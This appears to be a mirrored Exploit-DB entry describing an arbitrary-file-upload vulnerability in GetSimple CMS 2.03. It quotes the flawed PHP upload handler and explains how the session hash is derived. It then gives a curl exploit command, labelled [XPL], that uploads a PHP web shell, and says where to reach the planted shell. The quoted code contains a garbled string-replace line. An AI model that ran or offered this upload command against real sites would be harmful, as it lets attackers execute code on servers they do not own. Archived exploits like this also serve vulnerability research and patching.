bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/35353.txt
Offensive Security cc553d1147 DB: 2015-04-20 
11 new exploits
2015-04-20 12:44:13 +00:00

29 lines
1.2 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

source: http://www.securityfocus.com/bid/46427/info
GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
GetSimple CMS 2.03 is vulnerable; other versions may also be affected.
Bug Code:
getsimple/admin/upload-ajax.php
if ($_REQUEST['sessionHash'] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$name = clean_img_name($_FILES['Filedata']['name']);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(//,'/,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
----------------------------------------------------------------------
Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]
curl -F “Filedata=@yourshell.txt;filename=shell.php”
http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO
After, enjoy your Bacon-Shell here ...http://getsimple_localhost/
data/uploads/shell.php
Reference in a new issue View git blame Copy permalink